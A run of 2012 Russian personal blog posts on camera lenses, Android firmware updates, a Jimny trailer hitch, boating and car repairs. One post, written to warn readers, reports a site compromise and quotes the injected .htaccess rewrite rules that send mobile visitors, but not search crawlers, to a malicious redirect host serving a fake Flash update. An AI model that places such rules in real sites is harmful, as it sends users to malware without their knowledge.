Search in the blog:

2012-09-19

КМЗ возобновило выпуск (теперь официально)

Теперь уже официально: ОАО КМЗ возобновило выпуск трех фотообъективов:
===
Открытое акционерное общество «Красногорский завод им. С.А. Зверева» (ОАО КМЗ) возобновило выпуск объективов «МС Мир-20М», «Гелиос 40-2» и «Телезенитар 2,8/135».
...
Сверхширокоугольный объектив «МС Мир-20М» – сменный компактный объектив со светосилой 3,5/20.
...
Объектив «Гелиос 40-2» обладает высокой светосилой 1,5/85 и предназначен для съемки портретов, уличной съемки, в том числе при малой освещенности, быстро движущихся предметов, требующих малых величин выдержек и т.д.
...
Сменный длиннофокусный телеобъектив МС АПО «Телезенитар-М 2,8/135» имеет просветляющие многослойные покрытия, нанесенные на линзы объектива, которые увеличивают пропускание и уменьшают рассеяние света, что обеспечивает особенно благоприятную контрастность и резкость изображения, в значительной степени устраняет ореолы, блики и световые пятна даже при фотографировании против света.
===

Samsung Galaxy Note: IMM76D.XXLRT

Что-то Samsung Galaxy Note часто обновляет прошивку. И вот опять. С номера сборки IMM76D.XXLRQ до IMM76D.XXLRT.



Изображения из альбомов:

Sunset of Lenovo App Shop Sept 21, 2012

Sunset of Lenovo App Shop Sept 21, 2012
===
We are letting our Lenovo App Shop registered users know that the Lenovo App Shop will no longer be available as of September 21. Our store partner has discontinued operations and we recommend using the Google Play Store for your Android Applications.

Your previously downloaded applications from the Lenovo App Shop will continue to work, however we recommend you select and install a back up program from the Google Play Store to back up your apps. If you have issues with apps you obtained from the Lenovo App Shop, the app developer or Independent Software Vendor (ISV) can assist you.
If you have any other questions please refer to the following link: www.lenovo.com/support/appshop

We apologize for any inconvenience and appreciate you as a valued customer.
===

Давно пора! Лично мне эти колхозные "магазины" что Леновы, что Самсунга даром не нужны. Я туда заходил только один раз (когда прошивку камеры на SII обновлял).


Еще по этой теме:

Прицеп для Jimny

Как-то я вспомнил, что для УАЗа есть прицеп КМЗ-8284 (грузовой, с двухрядными бортами и колесными дисками 13" от Москвича). А почему он до сих пор не подцеплен к Jimny? При скромных размерах салона полезной вещью был бы.

Тем более, что на Jimny установлена проверенная задняя труба от Ромы Спринтера. Осталось лишь поставить прицепной шар и сделать проводку.

Самым сложным оказалось найти шар под резьбовое крепление. Дело в том, что мне нужен был именно наш ГОСТовский шар на 50мм, а кругом лежали кЕтайские дюймовые, самым близким из которых были 2", но все равно хотелось именно 50мм. Кое-как нашел метрический на 50мм, но диаметр посадочной резьбы был меньше, чем отверстие в "ухе" трубы. Поэтому сделали втулку для посадки с натягом. Получилось хорошо.



В "ухе" еще были просверлены отверстия для крепления страховочных цепей прицепа.

Еще такой момент. Машина лифтована, труба расположена на уровне рамы, поэтому даже с шинами штатного размера (205/70R15 - именно на них будет использоваться прицеп) расстояние от земли до верха шара получилось аж 65 см. Это заметно больше, чем обычно принято для прицепов (если я правильно помню, должно быть то ли 40, то ли 45 см). В моем случае это проблем не вызвало, даже наоборот. Сам прицеп был лифтован рессорами под перевозку земли УАЗом, поэтому дышло у него высокое. Даже были опасания, что на Jimny прицепное будет слишком низко, но оказалось самое то.

Но из-за высокого прицепного теперь нельзя открыть дверь при с подцепленным прицепом, поскольку мешает запаска (штатная!), упирающаяся в ручку сцепного механизма. Чтобы не корячиться и пользоваться дверью, приходится ставить "автопоезд" на переломе рельефа, чтобы ручка была чуть ниже траектории движения запаски при открытии задней двери. ;-) Тогда открывается нормально.

Проводку развести довольно просто. Все нужные провода собраны в районе заднего бампера с левой стороны:



На практике схема чуть разная, поскольку в зависимости от рынка отличается как минимум разводка тормозов и задних противотуманных фар. Можно просто смотреть все жгуты в этом указанном районе, выбирая провода по цвету:

1. Левый поворот GRN/RED (зелено/красный)
2. Правый поворот GRN/YEL (зелено/желтый)
3. Стоп-сигнал GRN/WHT (зелено/белый)
4. Габариты RED/YEL (красно/желтый)
5. Задний ход RED (красный)
6. Масса BLK (черный)
(задних противотуманок у меня на Jimny нет, поэтому не смотрел цвет их проводки)

В моем случае все провода были найдены прямо под бампером, единственное, не хватало заднего хода. Пришлось снять задний левый фонарь и взять задний ход оттуда.

Розетка обычная, кЕтайская. Расположил на месте штатного заднего номера, поскольку у меня номер перенесен на запаску, а там место удобное:





Место выбрал слева, чтобы было подальше от глушителя. На бездорожье совершенно не мешает, единственное настораживает, не сожрет ли от грязи контакты, которые только символически прикрыты кривой крышкой. Побрызгать контакты какой-нибудь защитной "химией"?

Проверка прошла успешно. Выглядит это так:




Вид сбоку (снято против солнца, видно плоховасто):




Впечатления хорошие. Прицеп неплохой. Барахла много помещается. ;-)

Ездить с прицепом лучше, чем на УАЗе!  Во-первых, нормальная обзорность назад (и через заднее стекло и через зеркала). Прицеп заметно шире машины по данным, но на практике с широкими расширителями арок разница не очень значительная. Назад видно хорошо, даже если за прицепом очень близко едет машина. Во-вторых, маневрировать задом удобнее. Jimny вертлявее, что позволяет более точно заруливать прицеп в нужном направлении. Где на УАЗе из-за плохого (даже ужасного, поскольку УАЗ тентованный) обзора нужно долго корячиться то вперед, то назад, на Jimny просто поворачиваешься и, глядя через заднее стекло, почти с первого раза правильно направляешь прицеп.

Тяги двигателя, конечно, маловато, особенно когда прицеп груженный, а в салоне пассажиры. Но если хорошо крутить двигатель, то можно ехать более или менее терпимо, не особо вываливаясь из потока. И тут возникает проблема на моем Jimny. Греется иногда, зараза! Если подъем довольно длинный и обороты двигателя большие, то начинает пожариваться. Часто помогает просто включить печку, но иногда и это не помогает - нужно здорово сбавлять скорость, чтобы двигатель охладился обратно. Надо эту проблему решать, конечно. Жаль я сразу не догадался скинуть для эксперимента переднюю лебедку, чтобы посмотреть, насколько она затрудняет обдув. А так только приходится гадать о причине (радиатор чистил, муфта вентилятора работает, охлаждайка нормальная и по уровню). Будем разбираться.

А в остальном все нормально, уже скатались с прицепом в поездку на около 800 км (суммарно, туда и обратно). Ничего не отвалилось, не сломалось. Тормозит тоже нормально, только нужно учитывать бОльшую массу и, соответственно, больший тормозной путь.

2012-09-18

Новые объективы Samsung NX 12-24 и 45

Так, еще и объективы представлены для Samsung NX: 12-24/4-5.6 и ожидаемый 45/1.8. Интересно, хотя 45-ый  крупноват. Или кажется таким?



Показательна резьба для фильтров (в продолжение темы). 43мм на 45/1.8 - это хорошо. Как на 16/2.4, 20/2.8 и 30/2. А вот 58мм на 12-24/4-5.6 - не очень. Лучше была бы 52мм (если это физически возможно).


Изображения из альбомов:

2012-09-17

FF-2012

Раз уж упомянул про Sony RX1. ;-)
Все таки эта Photokina 2012 проходит под знаком "фул-фрейма". Sony RX1 (FF с несменным объективом) и три цифрозеркалки от основных игроков: Sony A99, Nikon D600 и, конечно, Canon 6D.

Красота! Жаль, что так и нет беззеркалки со сменной оптикой с FF, но с маркетинговой точки зрения все правильно: было бы глупо Sony RX1 сразу делать со сменной оптикой (пусть даже системным был бы только этот 35/2). Сперва лучше "снять сливки".

Поэтому сидим спокойно год-два, а там, думаю, FF-беззеркалки со сменной оптикой станут куда более реальны.


Еще по этой теме:

Возвращение современного Гелиос-40?

Так, новость (чуть устаревшая): ОАО КМЗ примет участие в выставке «PHOTOKINA – 2012»
===
На выставке предприятие представит: цифровой панорамный фотоаппарат HORIZON DL-3, панорамные фотоаппараты «Горизонт S3pro» и «Горизонт S3 U-500», линейку фотообъективов МС «Зенитар» («Рыбий глаз»), линейку киносъемочных объективов «Оптар», а также фотообъективы «Таир», «Зенитар-К», «МС АПО Телезенитар М», «Гелиос 40», «F 90» и «F 114».
===

Ладно, мало ли что они там показывают на выставках. Но вот здесь обсуждение, что Гелиос-40 (85/1.5) скоро появится в продаже по цене 8000-8500 рублей, что заметно ниже обычной барыжной цены на такой б/у объектив.

Вопрос, конечно, в качестве. Мой купленный новым Зенитар 16/2.8 (рыбоглаз) сразу потребовал приложения рук

И для затравки уже проползавшая по форумам картинка:



Гелиос-40-2-C (с кэноновским байоненом).

У меня Гелиос-40 есть, кстати. Белый еще, под M39. Но новость показалась интересной. Даже более интересной, чем появление "мыльницы" Sony RX1 с несменяемым объективом 35/2 и матрицей 135 формата (фул-фрейм, как говорится). ;-)


Еще по этой теме:
Изображения из альбомов:

2012-09-16

Мобильные устройств и вирусы/трояны (один из обманов)

Что-то часто стал натыкаться на сайты, на заходе на которые с мобильных устройств выпрыгивает вот такая ересь:



Ясно дело, что к обновлению флеш-плейера это не имеет никакого отношения. Хоть и лень ковыряться, но стало интересно, в какой момент происходит переход на этот зловредный сайт с липовыми "обновлениями".

Поставил отладочный прокси на PC, поменял настройки Wi-Fi на телефоне. После первого же захода на такой сайт увидел в логах переадресацию (302) на некий statiks.ru, на котором еще одна переадресация на сайт (pdacontent.ru), где и предлагают обманку.

Поиск по statiks.ru особо ничего не дал, кроме одной немного квелой, но показательной темы на форуме какого хостера.

Вот как это работает (технически). У хостера подменяется файл .htaccess, прописывая переадресацию для мобильных устройств (которые определяются по user agent):

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://statiks.ru/?9 [L,R=302] # On


Не совсем понятно, как именно был получен доступ к .htaccess (то ли хостера поломали, то ли сами юзеры пароли легкие поставили, то ли пароли у юзеров украли), но это не суть важно (для меня). Важно, что нужно следить за .htaccess. ;-)

А для пользователей мобильных устройств полезно, если такая возможность, переключить в настройках браузера user agent с мобильного, на десктопный. В том же Opera Mobile такая возможность есть. Кроме того, после этого многие сайты перестанут подсовывать свои корявые урезанные версии страниц для мобил, которыми невозможно пользоваться.


Интересно, что за "обновлялка" (в случае Андроида)? Смотрите, что выпрыгивает при попытке ее установить:




Слишком много просит! Хотя это никто не читает. ;-) Дальше я проверять не стал, понятно. А ковыряться внутри apk-файла просто лень.

UPD: Подсказывают, что некоторые уроды-владельцы сайтов или админы сами добавляют эти строки в .htaccess для желания "подзаработать". На урановые рудники их.


Изображения из альбомов:

Закрытие сезона 2012




Закрыли водомоторный сезон в прошедшие выходные.  На Иркутском водохранилище (верхняя фотография сделана не там ;-)




Тепло и солнечно, но уже осень чувствуется. Ветер на выходе из залива развел какую-то волну не очень высокую, но не очень приятную для глиссирования , поэтому далеко не пошли, походили по закоулкам.




Уровень воды в водохранилище подняли, довольно заметно. Берег чуть подтопило местами:




Когда уже причалили к берегу и начали собираться, появились ГИМСовцы на своей мегалодке. Причем шлепанье дном по волнам и натужные завывания двигателя были слышны издалека. :-/




К нам интереса не проявили, но весьма активно шастали от рыбака к рыбаку в каждом закутке заливов.

К слову, моя первая встреча (хоть и на расстоянии) с ГИМС в этом году. ;-) Все лето их в этих краях не было ни видно, ни слышно.

В общем, водомоторный сезон 2012 года можно считать закрытым. Я доволен. Еще несколько заметок про оборудованию напишу и можно успокоиться до весны следующего года.


Изображения из альбомов:

2012-09-15

Прокол

Выхожу, а на Интегре колесо спустило. Посмотрел, а там прокол чем-то металлическим. Хотел прямо на месте заделать, но в арке места мало, да и оказалось, что пассатижи куда-то спрятались, а отверткой вытаскивать виновника неудобно.

Поэтому поставил докатку (только долго вспоминал, какое в ней давление должно быть, нашел на кузовной наклейке 4.2 бар), а проколом занялся в более спокойной обстановке.

Виновник:




Оказался гвоздь для бетона, да еще и под острым углом к протектору. Вон, он, зараза, возле ремкомплекта:



Ладно хоть не отвертка (было и такое).

Из-за острого угла сложно зачищать отверстие перед установкой жгута. Я делаю так: беру спицу велосипедную (под рукой просто была когда-то), ввожу ее в отверстие прокола, а потом поворачиваю шину так, чтобы спица располагалась строго вертикально. Спица извлекается, а потом уже можно орудовать шилом-рашпилем, держа его вертикально.

Были некоторые сомнения насчет жгутов, которым даже не помню сколько лет (пару лет точно есть). Но ремонт прошел успешно, ничего не спускает. А жгуты лучше обновить, наверное.


Еще по этой теме:
Изображения из альбомов:

2012-09-14

Galaxy Note (обновление)

Странное обновление для Galaxy Note. По сравнению с предыдущим поменялся номер сборки, да и то незначительно, и номер ядра (хотя само ядро осталось 3.0.15):




Странное тем, что после установки слетели полностью настройки рабочих столов. И, мне сложно судить, поскольку Note использую редко, но заметно поменялся интерфейс работы с рабочим столом (добавление виджетов и т.п.). А может и показалось. ;-)


Изображения из альбомов:

Вода

Просто фотография на воде.



Редкий момент, когда волна была довольно мелкая, можно сказать, что не было.


Изображения из альбомов:

2012-09-13

Винты 7" vs 6.5" для DF4 (DF6)

На выходных покатались на Малом Море Байкала на лодке, которую я туда, ясно дело, не забыл захватить.




Но речь не об этом. У меня постоянное ощущение, что на более тяжелом/скоростном винте с шагом 7" мотор идет как-то легче, чем на штатном 6.5". И тут довелось сплавать с нагрузкой за 200 кг (ближе к 250 кг). Лодка шла тяжеловато, тащила волну за кормой.




Решил поставить винт 6.5" (до этого стоял 7" для двоих). Но по ощущениям стало еще хуже. Мотор почти надрывается, скорость субъективно упала. Но посмотрел по GPS, оказалось наоборот. До этого скорость была около 8-10 км/ч (не на полном газе), а стала 10-12 км/ч. Но субъективно на 7" как-то поприятнее. Видимо из-за более низких оборотов двигателя создается впечатление меньшей нагрузки. Не верь глазам своим (и ощущениям). ;-)


Изображения из альбомов:

Иркутск, ну а кто же еще

Департамент андеррайтинга ОАО «АльфаСтрахование» впервые публикует рейтинг наиболее «аварийных» городов России.
===
Результаты исследования основаны на данных о заявленных случаях дорожно-транспортных происшествий клиентами компании, владельцами полисов каско, в период с 1 июня 2011 года по 30 июля 2012, а также представлены в сравнении с показателями аналогичного периода годом ранее (1 июня 2010 года по 30 июля 2011 года).
...
Верхнюю строчку российского рейтинга городов с наибольшей частотой заявляемых ДТП занимает Москва и Московская область.
...
Вторым городом России с наибольшей частотой аварий является Иркутск, здесь водители заявляют о ДТП в среднем один раз в 1,5 года (частота обращений по каско – 0,67). Иркутск – один из немногих городов, который по итогам анализируемого периода продемонстрировал рост количества обращений в страховую компанию с заявлением о ДТП: в аналогичном периоде годом ранее город занимал шестую строчку рейтинга, а его жители заявляли убытки по каско в среднем в 1,53 года (частота обращений по каско – 0,65).
===


Москва-то понятна с их ритмом жизни. А Иркутск попал на второе место заслужено. Высокая концентрация бескультурных, неумелых, отмороженных водителей. Движение по типу "захотел - повернул и поехал, разбегайтесь все". К этому поганые дороги и жуткая организация движения.


Еще по этой теме:

2012-09-12

Samsung ES9 (цифромыло)

Была цифромыльница Samsung ES9. Характеристики так себе. Матрица 1/2.3" в 12Мп, объектив  4.8-19.2/2.9-6.5 (ЭФР 27-108мм). Но на это смотришь иначе, когда ощущаешь мелкие размеры камеры и, главное, цену, которая составляла 2 т.р.

Для 2 т.р. камера, можно сказать, стоящая. Вообще удивительно, что оно работает за такие деньги. ;-) Снимает, несомненно, как мыльница, но мыльницы, которые в несколько раз дороже, снимают практически так же, если не хуже (видел такие "выдающиеся" экземпляры). Светосила на широком угле не f/3.5, а хотя бы f/2.9. Управление понятное, хотя не совсем удобное (кнопок мало, но это из-за размера). Питание ожидаемо двумя AA-батарейками (использовал аккумуляторы). Из недостатков отметил бы разве что слабоватое по современным меркам видео.

Все бы хорошо, но на отдыхе уронили камеру в песок. И все.




Почистили, продули. Но объектив безнадежно заклинило. Хотя сперва он даже пытался выдвигаться, но потом "подвис" в промежуточном положении. На экране при этом какая-то пространная рекомендация включить камеру:




Попытался разобрать, но лишь до уровня небольшой горки запчастей. ;-)



Для дальнейшей разборки не хватило опыта и знаний. Побоялся поломать, а инструкцию по ремонту  найти не удалось. Собрал обратно и убрал в ящик с барахлом.

Теперь не знаю, то ли еще раз такую же купить. То ли что-нибудь поинтереснее. Интересно попробовать другую камеру. Но отдавать даже 10 т.р. за камеру с несменным объективом, да еще и с мелкоматрицей как-то неоправданно глупо.


Изображения из альбомов:

2012-09-11

Барабанные тормоза и вода

Второй раз уже попадаюсь. На Интегре после сравнительно глубокой лужи проезжаю метров 200 и оставляю машину на пару недель. В результате блокируется и перестает крутиться одно из задних колес. Колодки успевают приржаветь к барабану. В первый раз просто без последствий сорвал при трогании с места, даже сперва не понял. Второй раз колесо никак не хотело крутиться, волочилось по бетону. Пришлось снимать барабан.




Внутри все оказалось в ржавчине. Почистил, поставил, поехало. Но барабанные тормоза не люблю все больше.


Изображения из альбомов:

Горхон

С поездки на Китой-Кин запомнилось название Хара-Горхон. Это приток Китой-Кина.

После этого смотрел карту притоков Иркута и увидел там еще два названия: Обо-Горхон и просто Горхон. А потом на карте нашел еще много "горхонов": Чертолен-Горхон, Шунтын-Горхон, Сардыки-Горхон и т.д.

Посмотрел бурятско-русский словарь, и все стало ясно. На бурятском языке горхон - это ручей, (маленькая) речка. Теперь понятно, почему такие названия.

Смотрел еще советскую карту и увидел название реки Бого-Горхон и это же название для известного у нас поселка Жемчуг, что в Тункинской долине.




Поискал и нашел такую историю (не знаю, насколько она правдива):

===
Центральной усадьбой совхоза стал улус Буга-Горхон, где располагался Сельский совет. Позднее когда на автомобильной трассе проставили названия, получилось, что улус Буга-Горхон – стал именоваться Жемчугом, а название речки по ошибке допущенной дорожниками из Москвы не знающими нашего языка превратилось в Бого-Горхон. (из лосиного в мусорную речку).
===


Изображения из альбомов:

2012-09-09

Письма из налоговой

В некоторых городах налоговая, смотрю, перешла с отправки налоговых извещений заказными письмами почты РФ на отправку через всякие местные курьерские службы. Как бы хорошо, домой принесут. Но на практике все как с тем же EMS. Домой припрутся в самое неудобное время, когда никого нет. В результате за письмом придется тащиться в единственное отделение, расположенное в диком месте, а там стоять в очереди с такими же жаждущими получателями.

2012-09-06

Lenovo TPT и разблокировка

Программисты из Lenovo стараются, стараются, но результат какой-то невпечатляющий.

На Lenovo ThinkPad Tablet изначала была какая-то тормозноватая разблокировка экрана. Между нажатием кнопки и появлением изображения была ощутимая пауза. Да еще и экран не сразу начинал реагировать на прикосновения. После обновления на Android 4 стало еще хуже. Причем как-то постепенно. Свежая система еще как-то терпимо ведет, но потом появляются совсем уж дикие задержки (по несколько секунд). Очень раздражает.

И вот, вроде бы, очередное обновление:




Список изменений обнадеживает:




При прошивке появляется интересная надпись на разных языках:




Версия после прошивки: A400_03_0070_0132_WE

Но, увы. Признаю, что особого изменения с разблокировкой не заметил. Зря старались! Более того, иногда при разблокировке вообще пропадает реакция на перо (на палец остается).


Изображения из альбомов:

2012-09-05

Биения руля (серия уже не помню какая)

Похоже, на тему биения руля у Jimny можно рассуждать годами. Вот опять появилось желание добавить еще один пункт в мой список причин этого биения.

Дело в том, что опять вылезла тряска руля, в легкой форме, но заметно. Даже сперва мелькнула мысль, а не вышел ли из строя амортизатор рулевого демпфера. Снял его, проверил. Динамометром не измерял, но по субъективным ощущениям работает, дает весьма ощутимое сопротивление движению штока относительно корпуса.

Понятно дело, что пункт 1 в порядок не приведен, поэтому и особо рассуждать нечего. Я про сайлентблоки в передней тяге панара GIZ. Так и не смог подобрать замену, катаюсь с немного надорванными. Это момент, про который как-то не думается в момент покупки регулируемой тяги, но где брать сайлентблоки/резиновые втулки для нее, когда они износятся? Желательно об этом знать ДО покупки. ;-)

Но, с другой стороны, тряска вылезла после того, как погнул длинную рулевую тягу.  Тягу выгнул, но не идеально. Тем более, что до этого она уже была однажды гнутой. И вот тут вспомнилось, что именно после того, как погнул тягу в первый раз, и вылезло страшное биение руля (с ощущением, что передняя подвеска идет в разнос).

Поэтому надо следить и за рулевыми тягами. А вот насчет тормозных дисков могу сказать, что их влияние на биение сильно преувеличено. Совершенно не увидел разницы между старыми, царапанными, чуть гнутыми и новыми тормозными дисками.

Blog Archive